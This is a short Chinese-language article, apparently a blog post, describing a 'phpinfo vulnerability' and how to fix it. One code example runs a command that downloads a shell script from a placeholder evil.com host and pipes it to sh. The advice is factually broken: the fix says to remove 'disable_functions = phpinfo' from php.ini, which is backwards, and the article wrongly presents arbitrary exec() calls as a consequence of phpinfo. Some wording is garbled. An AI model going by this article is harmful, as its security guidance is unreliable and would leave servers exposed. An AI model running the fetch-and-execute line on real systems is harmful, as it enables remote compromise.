近期，一種針對PHP的漏洞——phpinfo漏洞再次被攻擊者利用，給網(wǎng)絡(luò)安全帶來了極大的威脅。phpinfo漏洞最初是由于PHP本身提供的phpinfo函數(shù)，在調(diào)用時可以直接將系統(tǒng)的信息以及PHP配置信息進(jìn)行輸出，從而方便了開發(fā)人員查詢和了解系統(tǒng)的相關(guān)信息。然而，當(dāng)攻擊者對這些信息進(jìn)行針對性分析后，預(yù)則立竿而待，從而對系統(tǒng)造成安全威脅。

舉個例子，如果一個網(wǎng)站存在phpinfo漏洞，攻擊者可以通過如下代碼獲取網(wǎng)站根目錄的路徑：

<?php
	echo phpinfo();
	?>

然后，攻擊者就可以通過訪問類似于http://www.example.com/phpinfo.php這樣的鏈接來得到網(wǎng)站根目錄的路徑。進(jìn)一步說，他們就可以利用這個漏洞來獲得網(wǎng)站的文件存儲路徑，找到目標(biāo)文件并對該文件進(jìn)行惡意操作。

同時，這個漏洞也可以讓攻擊者遠(yuǎn)程執(zhí)行代碼，從而在網(wǎng)站服務(wù)器上執(zhí)行任意命令。比如一個攻擊者通過如下方式執(zhí)行一個遠(yuǎn)程路徑上的shell腳本：

<?php
	exec('/bin/bash -c "curl http://evil.com/maliciouscode.sh | /bin/sh"');
	?>

通過這種方式，攻擊者可以在服務(wù)器上部署惡意代碼、植入后門，從而對網(wǎng)站進(jìn)行控制。

如上兩種情況就是phpinfo漏洞的典型案例，可以看到，攻擊者可以輕松地獲取網(wǎng)站存儲路徑和遠(yuǎn)程執(zhí)行代碼，極大地增加了網(wǎng)站安全性的風(fēng)險。因此，phpinfo漏洞的修復(fù)顯得尤為重要。

修復(fù)phpinfo漏洞的方法很簡單，只需在服務(wù)器上找到php.ini配置文件，將如下代碼從php.ini文件中刪除即可：

disable_functions = phpinfo

這樣一來，就可以成功地屏蔽phpinfo函數(shù)，避免被攻擊者利用。同時，也建議開發(fā)人員在開發(fā)網(wǎng)站時使用優(yōu)秀、可靠的框架，并將有關(guān)敏感信息進(jìn)行涂層處理，以降低被攻擊的風(fēng)險。

綜上所述，phpinfo漏洞對網(wǎng)站安全性構(gòu)成的威脅還是比較大的。而修復(fù)這個漏洞的方法很簡單，只需將php.ini配置文件中的disable_functions = phpinfo這行刪除即可。在日常的網(wǎng)絡(luò)維護(hù)中，我們一定要注意加強對各類漏洞的預(yù)防。